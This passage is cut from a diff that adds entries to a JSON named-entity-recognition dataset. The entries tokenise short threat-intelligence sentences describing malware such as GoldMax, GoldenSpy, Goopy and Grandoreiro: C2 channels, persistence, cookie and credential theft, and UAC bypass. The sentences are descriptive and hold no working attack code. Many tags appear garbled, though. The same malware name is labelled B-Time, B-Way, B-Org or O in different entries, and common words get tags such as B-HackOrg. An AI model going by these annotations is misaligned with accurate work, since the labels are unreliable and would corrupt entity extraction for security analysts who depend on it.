"O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get2", + "has", + "the", + "ability", + "to", + "run", + "executables", + "with", + "command-line", + "arguments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get2", + "has", + "the", + "ability", + "to", + "inject", + "DLLs", + "into", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Get2", + "has", + "the", + "ability", + "to", + "identify", + "running", + "processes", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get2", + "has", + "the", + "ability", + "to", + "identify", + "the", + "computer", + "name", + "and", + "Windows", + "version", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get2", + "has", + "the", + "ability", + "to", + "identify", + "the", + "current", + "username", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get2", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "to", + "send", + "information", + "collected", + "from", + "an", + "infected", + "host", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "encrypts", + "data", + "using", + "Base64", + "before", + "being", + "sent", + "to", + "the", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "terminates", + "anti-malware", + "processes", + "if", + "they’re", + "found", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "deletes", + "one", + "of", + "its", + "files,", + "2.hwp,", + "from", + "the", + "endpoint", + "after", + "establishing", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "lists", + "the", + "directories", + "for", + "Desktop,", + "program", + "files,", + "and", + "the", + "user’s", + "recently", + "accessed", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "can", + "download", + "additional", + "components", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "stores", + "information", + "gathered", + "from", + "the", + "endpoint", + "in", + "a", + "file", + "named", + "1.hwp." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "checks", + "the", + "running", + "processes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "enumerates", + "registry", + "keys", + "with", + "the", + "command", + "<code>regkeyenum</code>", + "and", + "obtains", + "information", + "for", + "the", + "Registry", + "key", + "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "establishes", + "persistence", + "in", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "checks", + "for", + "anti-malware", + "products", + "and", + "processes." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "collects", + "endpoint", + "information", + "using", + "the", + "<code>systeminfo</code>", + "command." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "collects", + "the", + "endpoint", + "victim's", + "username", + "and", + "uses", + "it", + "as", + "a", + "basis", + "for", + "downloading", + "additional", + "components", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "uses", + "HTTP", + "for", + "communication", + "to", + "the", + "control", + "servers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "Gold", + "Dragon", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "for", + "discovery." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldFinder", + "logged", + "and", + "stored", + "information", + "related", + "to", + "the", + "route", + "or", + "hops", + "a", + "packet", + "took", + "from", + "a", + "compromised", + "machine", + "to", + "a", + "hardcoded", + "C2", + "server,", + "including", + "the", + "target", + "C2", + "URL,", + "HTTP", + "response/status", + "code,", + "HTTP", + "response", + "headers", + "and", + "values,", + "and", + "data", + "received", + "from", + "the", + "C2", + "node." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldFinder", + "performed", + "HTTP", + "GET", + "requests", + "to", + "check", + "internet", + "connectivity", + "and", + "identify", + "HTTP", + "proxy", + "servers", + "and", + "other", + "redirectors", + "that", + "an", + "HTTP", + "request", + "traveled", + "through." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldFinder", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "RSA-encrypted", + "its", + "communication", + "with", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "GoldMax", + "Linux", + "variant", + "has", + "used", + "a", + "crontab", + "entry", + "with", + "a", + "<code>@reboot</code>", + "line", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "decoded", + "and", + "decrypted", + "the", + "configuration", + "file", + "when", + "executed." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "written", + "AES-encrypted", + "and", + "Base64-encoded", + "configuration", + "files", + "to", + "disk." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "can", + "exfiltrate", + "files", + "over", + "the", + "existing", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "GoldMax", + "Linux", + "variant", + "has", + "been", + "executed", + "with", + "the", + "`nohup`", + "command", + "to", + "ignore", + "hangup", + "signals", + "and", + "continue", + "to", + "run", + "if", + "the", + "terminal", + "session", + "was", + "terminated." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "can", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "used", + "decoy", + "traffic", + "to", + "surround", + "its", + "malicious", + "network", + "traffic", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "impersonated", + "systems", + "management", + "software", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "used", + "filenames", + "that", + "matched", + "the", + "system", + "name,", + "and", + "appeared", + "as", + "a", + "scheduled", + "task", + "impersonating", + "systems", + "management", + "software", + "within", + "the", + "corresponding", + "ProgramData", + "subfolder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "used", + "scheduled", + "tasks", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "been", + "packed", + "for", + "obfuscation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "will", + "check", + "if", + "it", + "is", + "being", + "run", + "in", + "a", + "virtualized", + "environment", + "by", + "comparing", + "the", + "collected", + "MAC", + "address", + "to", + "<code>c8:27:cc:c2:37:5a</code>." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "retrieved", + "a", + "list", + "of", + "the", + "system's", + "network", + "interface", + "after", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "can", + "check", + "the", + "current", + "date-time", + "value", + "of", + "the", + "compromised", + "system,", + "comparing", + "it", + "to", + "the", + "hardcoded", + "execution", + "trigger", + "and", + "can", + "send", + "the", + "current", + "timestamp", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "set", + "an", + "execution", + "trigger", + "date", + "and", + "time,", + "stored", + "as", + "an", + "ASCII", + "Unix/Epoch", + "time", + "value." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "has", + "used", + "HTTPS", + "and", + "HTTP", + "GET", + "requests", + "with", + "custom", + "HTTP", + "cookies", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldMax", + "can", + "spawn", + "a", + "command", + "shell,", + "and", + "execute", + "native", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "has", + "been", + "packaged", + "with", + "a", + "legitimate", + "tax", + "preparation", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy's", + "uninstaller", + "has", + "base64-encoded", + "its", + "variables." + ], + "ner_tags": [ + "B-Way", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "has", + "exfiltrated", + "host", + "environment", + "information", + "to", + "an", + "external", + "C2", + "domain", + "via", + "port", + "9006." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy's", + "uninstaller", + "can", + "delete", + "registry", + "entries,", + "files", + "and", + "folders,", + "and", + "finally", + "itself", + "once", + "these", + "tasks", + "have", + "been", + "completed." + ], + "ner_tags": [ + "B-Time", + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "has", + "included", + "a", + "program", + "\"ExeProtector\",", + "which", + "monitors", + "for", + "the", + "existence", + "of", + "GoldenSpy", + "on", + "the", + "infected", + "system", + "and", + "redownloads", + "if", + "necessary." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "constantly", + "attempts", + "to", + "download", + "and", + "execute", + "files", + "from", + "the", + "remote", + "C2,", + "including", + "GoldenSpy", + "itself", + "if", + "not", + "found", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "can", + "create", + "new", + "users", + "on", + "an", + "infected", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy's", + "setup", + "file", + "installs", + "initial", + "executables", + "under", + "the", + "folder", + "<code>%WinDir%\\System32\\PluginManager</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "can", + "execute", + "remote", + "commands", + "in", + "the", + "Windows", + "command", + "shell", + "using", + "the", + "<code>WinExec()</code>", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "has", + "used", + "HTTP", + "over", + "ports", + "9005", + "and", + "9006", + "for", + "network", + "traffic,", + "9002", + "for", + "C2", + "requests,", + "33666", + "as", + "a", + "WebSocket,", + "and", + "8090", + "to", + "download", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "has", + "gathered", + "operating", + "system", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy's", + "installer", + "has", + "delayed", + "installation", + "of", + "GoldenSpy", + "for", + "two", + "hours", + "after", + "it", + "reaches", + "a", + "victim", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "has", + "used", + "the", + "Ryeol", + "HTTP", + "Client", + "to", + "facilitate", + "HTTP", + "internet", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "can", + "execute", + "remote", + "commands", + "via", + "the", + "command-line", + "interface." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GoldenSpy", + "has", + "established", + "persistence", + "by", + "running", + "in", + "the", + "background", + "as", + "an", + "autostart", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "had", + "null", + "characters", + "padded", + "in", + "its", + "malicious", + "DLL", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "delete", + "emails", + "used", + "for", + "C2", + "once", + "the", + "content", + "has", + "been", + "copied." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "side-load", + "malicious", + "DLLs", + "with", + "legitimate", + "applications", + "from", + "Kaspersky,", + "Microsoft,", + "and", + "Google." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg", + "B-Way", + "O", + "O", + "O", + "O", + "B-Time", + "B-Org", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "communicate", + "with", + "its", + "C2", + "over", + "DNS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "exfiltrate", + "documents", + "from", + "infected", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "used", + "a", + "polymorphic", + "decryptor", + "to", + "decrypt", + "itself", + "at", + "runtime." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "disable", + "Microsoft", + "Outlook's", + "security", + "policies", + "to", + "disable", + "macro", + "warnings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "exfiltrate", + "data", + "over", + "the", + "Microsoft", + "Outlook", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "use", + "a", + "Microsoft", + "Outlook", + "backdoor", + "macro", + "to", + "communicate", + "with", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "impersonated", + "the", + "legitimate", + "goopdate.dll,", + "which", + "was", + "dropped", + "on", + "the", + "target", + "system", + "with", + "a", + "legitimate", + "GoogleUpdate.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "enumerate", + "the", + "infected", + "system's", + "user", + "name", + "via", + "<code>GetUserNameW</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Goopy's", + "decrypter", + "have", + "been", + "inflated", + "with", + "junk", + "code", + "in", + "between", + "legitimate", + "API", + "functions,", + "and", + "also", + "included", + "infinite", + "loops", + "to", + "avoid", + "analysis." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "checked", + "for", + "the", + "Google", + "Updater", + "process", + "to", + "ensure", + "Goopy", + "was", + "loaded", + "properly." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "maintain", + "persistence", + "by", + "creating", + "scheduled", + "tasks", + "set", + "to", + "run", + "every", + "hour." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "enumerate", + "the", + "infected", + "system's", + "user", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "use", + "a", + "Microsoft", + "Outlook", + "backdoor", + "macro", + "to", + "communicate", + "with", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "communicate", + "with", + "its", + "C2", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Goopy", + "has", + "the", + "ability", + "to", + "use", + "cmd.exe", + "to", + "execute", + "commands", + "passed", + "from", + "an", + "Outlook", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "identify", + "installed", + "security", + "tools", + "based", + "on", + "window", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "use", + "SSL", + "in", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "utilize", + "web", + "services", + "including", + "Google", + "sites", + "to", + "send", + "and", + "receive", + "C2", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "has", + "added", + "BMP", + "images", + "to", + "the", + "resources", + "section", + "of", + "its", + "Portable", + "Executable", + "(PE)", + "file", + "increasing", + "each", + "binary", + "to", + "at", + "least", + "300MB", + "in", + "size." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "use", + "malicious", + "browser", + "extensions", + "to", + "steal", + "cookies", + "and", + "other", + "user", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "monitor", + "browser", + "activity", + "for", + "online", + "banking", + "actions", + "and", + "display", + "full-screen", + "overlay", + "images", + "to", + "block", + "user", + "access", + "to", + "the", + "intended", + "site", + "or", + "present", + "additional", + "data", + "fields." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "bypass", + "UAC", + "by", + "registering", + "as", + "the", + "default", + "handler", + "for", + ".MSC", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "capture", + "clipboard", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "steal", + "cookie", + "data", + "and", + "credentials", + "from", + "Google", + "Chrome." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "obtain", + "C2", + "information", + "from", + "Google", + "Docs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "decrypt", + "its", + "encrypted", + "internal", + "strings." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "block", + "the", + "Deibold", + "Warsaw", + "GAS", + "Tecnologia", + "security", + "tool", + "at", + "the", + "firewall", + "level." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "hook", + "APIs,", + "kill", + "processes,", + "break", + "file", + "system", + "paths,", + "and", + "change", + "ACLs", + "to", + "prevent", + "security", + "tools", + "from", + "running." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "I-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "use", + "a", + "DGA", + "for", + "hiding", + "C2", + "addresses,", + "including", + "use", + "of", + "an", + "algorithm", + "with", + "a", + "user-specific", + "key", + "that", + "changes", + "daily." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "has", + "used", + "compromised", + "websites", + "and", + "Google", + "Ads", + "to", + "bait", + "victims", + "into", + "downloading", + "its", + "installer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "parse", + "Outlook", + ".pst", + "files", + "to", + "extract", + "e-mail", + "addresses." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + 